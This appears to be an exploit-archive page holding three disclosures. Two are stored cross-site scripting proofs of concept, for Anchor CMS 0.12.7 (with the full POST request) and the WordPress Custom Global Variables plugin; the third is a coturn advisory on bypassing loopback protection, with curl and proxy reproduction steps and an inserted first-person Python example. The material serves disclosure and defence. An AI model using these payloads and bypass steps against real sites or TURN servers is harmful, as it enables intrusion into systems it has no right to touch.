Anchor CMS version 0.12.7 suffers from a markdown persistent cross site scripting vulnerability. Original discovery of persistent cross site scripting in this version was discovered by Sinem Sahin in September of 2020.


MD5 | 5442ddd4ae9b993797182a4aea1c8c0e

# Exploit Title: Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting
# Date: 2021-01-10
# Exploit Author: Ramazan Mert GÖKTEN
# Vendor Homepage: anchorcms.com
# Vulnerable Software: https://github.com/anchorcms/anchor-cms/releases/download/0.12.7/anchor-cms-0.12.7-bundled.zip
# Affected Version: [ 0.12.7 ]
# Tested on: Windows 10

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: markdown
# Attack Pattern: <script>prompt("RMG_XSS_PoC")</script>

# Description

Exploitation of the vulnerability is shown below:

1-) Log into the admin panel ( vulnerableapplication.com/anchor/admin )
2-) Click the "Create a new post" button on the Posts tab ( from "vulnerableapplication.com/anchor/admin/posts" to "vulnerableapplication.com/anchor/admin/posts/add" )
3-) Enter the payload defined above (<script>prompt("RMG_XSS_PoC")</script>) in the markdown parameter, then click the "save" button
4-) Finally, return to the home page, where the triggered vulnerability is shown

# Proof of Concepts:

Request;

POST /anchor/admin/posts/add HTTP/1.1
Host: vulnerableapplication.com
Connection: close
Content-Length: 234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://vulnerableapplication.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerableapplication.com/anchor/admin/posts/add
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9
Cookie: anchorcms=eokq2ggm8mc4ulg2ii01a92a7d1jqvof7er085tqp9mvmdk2i3h1; _ga=GA1.2.798164571.1610282526; _gid=GA1.2.1405266792.1610282526; _gat=1

token=uyBOhuKe5lRACERuFGu9CzEqUVe9b6LgfNLFWA6rJJOjG5BPUr2XxZzUV0pMXiQn&title=xss-poc-test&markdown=%3Cscript%3Eprompt(%22RMG_XSS_PoC%22)%3C%2Fscript%3E&slug=xss-poc-test&description=&status=published&category=8&css=&js=&autosave=false

Response;

HTTP/1.1 200 OK
Date: Sun, 10 Jan 2021 12:50:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Robots-Tag: noindex,nofollow
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 105

{"id":"3","notification":"Your new article was created","redirect":"\/anchor\/admin\/posts\/edit\/3"}


Coturn 4.5.1.x Access Control Bypass


Coturn version 4.5.1.x suffers from a loopback access control bypass vulnerability.


MD5 | 253cda007888131792b88ab2a5964ea2

# Loopback access control bypass in coturn by using 0.0.0.0, [::1] or [::] as the peer address

- Fixed version: 4.5.2
- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-01-coturn-access-control-bypass
- Coturn Security Advisory: https://github.com/coturn/coturn/security/advisories/GHSA-6g6j-r9rf-cm7p
- Other references:
- CVE-2020-26262
- https://www.rtcsec.com/post/2021/01/details-about-cve-2020-26262-bypass-of-coturns-default-access-control-protection/
- Tested vulnerable versions: 4.5.1.x
- Timeline:
- Report date: 2020-11-20
- Issue confirmed by coturn developers: 2020-11-23
- Security patch provided by Enable Security: 2020-11-30
- Refactoring by coturn developers: 2020-12-07 to 2020-12-10
- Joint Enable Security and Coturn project advisory publication: 2021-01-11

## Description

By default coturn does not allow peers to connect and relay packets to loopback addresses in the range of `127.x.x.x`. However, it was observed that when sending a `CONNECT` request with the `XOR-PEER-ADDRESS` value of `0.0.0.0`, a successful response was received and subsequently, `CONNECTIONBIND` also received a successful response. Coturn then was able to relay packets to local network services.

Additionally, when coturn was listening on IPv6, which is the default setting, local services could also be reached by making use of either `[::1]` or `[::]` as the peer address.

## Impact

By using the address `0.0.0.0` as the peer address, a malicious user will be able to relay packets to the loopback interface, unless `--denied-peer-ip=0.0.0.0` (or similar) has been specified. Since the default configuration implies that loopback peers are not allowed, coturn administrators may choose to not set the `denied-peer-ip` setting. Similar implications apply to the IPv6 equivalent of `[::1]` and `[::]`.

## How we reproduced the issue

1. Run coturn using the following command:

   ```
   turnserver -v --user=username1:password1
   ```

2. Run our internal tool `stunner`, acting as a socks5 proxy which uses TURN.

   ```
   stunner turn peer proxy socks5 tcp://172.17.0.2:3478 \
       --local-bind 0.0.0.0:9999 -u username1:password1
   ```

3. Run a cURL command to connect to `127.0.0.1:80`.

   ```
   curl -x socks5h://127.0.0.1:9999 http://127.0.0.1
   ```

4. The following log was observed, confirming that `127.0.0.1` is being blocked:

   ```
   725: IPv4. tcp or tls connected to: 172.17.0.1:36504
   725: session 011000000000000001: realm <172.17.0.2> user <>: incoming packet message processed, error 401: Unauthorized
   725: IPv4. Local relay addr: 172.17.0.2:51705
   725: session 011000000000000001: new, realm=<172.17.0.2>, username=<username1>, lifetime=600
   725: session 011000000000000001: realm <172.17.0.2> user <username1>: incoming packet ALLOCATE processed, success
   725: session 011000000000000001: realm <172.17.0.2> user <username1>: incoming packet CONNECT processed, error 403: Forbidden IP
   725: session 011000000000000001: realm <172.17.0.2> user <username1>: incoming packet message processed, error 403: Forbidden IP
   ```

5. Run a cURL command to connect to `0.0.0.0:80`.

   ```
   curl -x socks5h://127.0.0.1:9999 http://0.0.0.0
   ```

6. The following log was observed, confirming that the loopback protection has been bypassed:

   ```
   1010: IPv4. tcp or tls connected to: 172.17.0.1:37240
   1010: session 005000000000000001: realm <172.17.0.2> user <>: incoming packet message processed, error 401: Unauthorized
   1010: IPv4. Local relay addr: 172.17.0.2:62504
   1010: session 005000000000000001: new, realm=<172.17.0.2>, username=<username1>, lifetime=600
   1010: session 005000000000000001: realm <172.17.0.2> user <username1>: incoming packet ALLOCATE processed, success
   1010: session 005000000000000001: realm <172.17.0.2> user <username1>: incoming packet CONNECT processed, success
   1010: IPv4. tcp or tls connected to: 172.17.0.1:37242
   1010: session 000000000000000001: client socket to be closed in client handler
   1010: session 000000000000000001: usage: realm=<172.17.0.2>, username=<>
   1010: session 005000000000000001: realm <172.17.0.2> user <username1>: incoming packet CONNECTION_BIND processed, success
   1010: session 000000000000000001: peer usage: realm=<172.17.0.2>
   1010: session 000000000000000001: closed (2nd stage), user <> realm <172.17.0.2> origin <>, local 172.17.0.2:3478, remote 172.17.0.1:37242, reason: general
   ```

The 5th step could be repeated with the URL of `http://[::1]` and `http://[::]` where one would also bypass the default protection against loopback connections.
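The bypass works because the default filter only asks "is this 127.x.x.x?", while the host's TCP stack connects to `0.0.0.0`, `::` and `::1` as the local machine. The Python below is an added example of mine, not coturn's code: it encodes and decodes the `XOR-PEER-ADDRESS` attribute that a `CONNECT` request carries (RFC 5389/5766 wire format), shows a filter modelled on the pre-4.5.2 behaviour described above (an approximation of that logic, not coturn's actual source) letting `0.0.0.0` through, and a hardened check that also rejects unspecified addresses, IPv6 loopback, IPv4-mapped forms of all of these and the `0.0.0.0/8` block the mitigation section recommends denying. The transaction id and the peer list are constructed for the demonstration.

```python
import ipaddress
import struct

MAGIC_COOKIE = 0x2112A442
XOR_PEER_ADDRESS = 0x0012   # attribute type, RFC 5766
CONNECT_METHOD = 0x000A     # method of the TCP-allocation CONNECT request, RFC 6062


def encode_xor_peer_address(ip, port, txid):
    """XOR-PEER-ADDRESS TLV: port and address are XORed with the magic cookie
    (for IPv6, the cookie followed by the 12-byte transaction id)."""
    addr = ipaddress.ip_address(ip)
    family = 0x01 if addr.version == 4 else 0x02
    key = struct.pack("!I", MAGIC_COOKIE) + (txid if addr.version == 6 else b"")
    x_port = port ^ (MAGIC_COOKIE >> 16)
    x_addr = bytes(a ^ k for a, k in zip(addr.packed, key))
    value = struct.pack("!BBH", 0, family, x_port) + x_addr
    return struct.pack("!HH", XOR_PEER_ADDRESS, len(value)) + value


def decode_xor_peer_address(tlv, txid):
    """Reverse of the above; returns (ip_address, port) as the server sees it."""
    atype, _ = struct.unpack("!HH", tlv[:4])
    if atype != XOR_PEER_ADDRESS:
        raise ValueError("not an XOR-PEER-ADDRESS attribute")
    _, family, x_port = struct.unpack("!BBH", tlv[4:8])
    size = 4 if family == 0x01 else 16
    key = struct.pack("!I", MAGIC_COOKIE) + (txid if family == 0x02 else b"")
    raw = bytes(a ^ k for a, k in zip(tlv[8:8 + size], key))
    return ipaddress.ip_address(raw), x_port ^ (MAGIC_COOKIE >> 16)


def naive_peer_allowed(ip):
    """Approximation of the vulnerable default: only 127.0.0.0/8 counts as loopback."""
    return ipaddress.ip_address(ip) not in ipaddress.ip_network("127.0.0.0/8")


# The range the advisory suggests adding with denied-peer-ip on unpatched versions.
DEFAULT_DENIED = (ipaddress.ip_network("0.0.0.0/8"),)


def hardened_peer_allowed(ip, denied=DEFAULT_DENIED):
    """Reject every address the host resolves to itself: 127/8, 0.0.0.0 (and
    0/8), ::, ::1, and IPv4-mapped IPv6 forms of any of these."""
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped          # ::ffff:127.0.0.1 is still loopback
    if addr.is_loopback or addr.is_unspecified:
        return False
    return not any(addr in net for net in denied)


def connect_decision(tlv, txid, policy):
    """What the relay would answer to a CONNECT carrying this peer attribute."""
    peer_ip, _ = decode_xor_peer_address(tlv, txid)
    return "success" if policy(str(peer_ip)) else "403 Forbidden IP"


if __name__ == "__main__":
    txid = b"\x00" * 12  # constructed transaction id
    for peer in ["127.0.0.1", "0.0.0.0", "::1", "::", "::ffff:127.0.0.1", "93.184.216.34"]:
        tlv = encode_xor_peer_address(peer, 80, txid)
        print(f"{peer:>18}  naive={connect_decision(tlv, txid, naive_peer_allowed):<17}"
              f"  hardened={connect_decision(tlv, txid, hardened_peer_allowed)}")
```

The point of the hardened check is to normalise first (unmap IPv4-mapped IPv6) and then reason about what the address means to the kernel, rather than matching one literal prefix; a deny list alone, as the mitigation section notes, has to be maintained per address family.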

## Solution and recommendations

We recommend upgrading coturn to the latest version, 4.5.2 which fixes this issue.

To mitigate this issue in previous versions, the addresses in the address block `0.0.0.0/8` should be denied by making use of the `denied-peer-ip` configuration setting. The following is an example configuration that prevents access to `0.0.0.0`:

```
denied-peer-ip=0.0.0.0-0.255.255.255
```

Additionally, as a mitigation step when the patch cannot yet be applied, we recommend disabling IPv6 if not required by listening on an IPv4 IP address. See our blog post for an [explanation][1] for this recommendation.

[1]: https://www.rtcsec.com/post/2021/01/details-about-cve-2020-26262-bypass-of-coturns-default-access-control-protection/#faq

Enable Security would like to thank Mészáros Mihály and the developers at Coturn for the very quick response and fixing this security issue.


## About Enable Security

[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

## Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

## Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>.

WordPress Custom Global Variables 1.0.5 Cross Site Scripting


WordPress Custom Global Variables plugin version 1.0.5 suffers from a persistent cross site scripting vulnerability.


MD5 | 2d80e7fb324be961dcb746d929730fdc

# Exploit Title: WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS) 
# Google Dork: NA
# Date: 09/01/2021
# Exploit Author: Swapnil Subhash Bodekar
# Vendor Homepage:
# Software Link: https://wordpress.org/plugins/custom-global-variables/#developers
# Version: 1.0.5
# Tested on Windows

How to reproduce vulnerability:

1. Install WordPress 5.6
2. Install and activate the Custom Global Variables plugin.
3. Navigate to Settings >> Custom Global Variables and enter data into the user input field.
4. Capture the request in Burp Suite and append the JavaScript payload mentioned below
"><script>(1)</script><"
5. You will observe that the payload is stored in the database, and whenever the same functionality is triggered again the JavaScript payload executes and a pop-up appears.

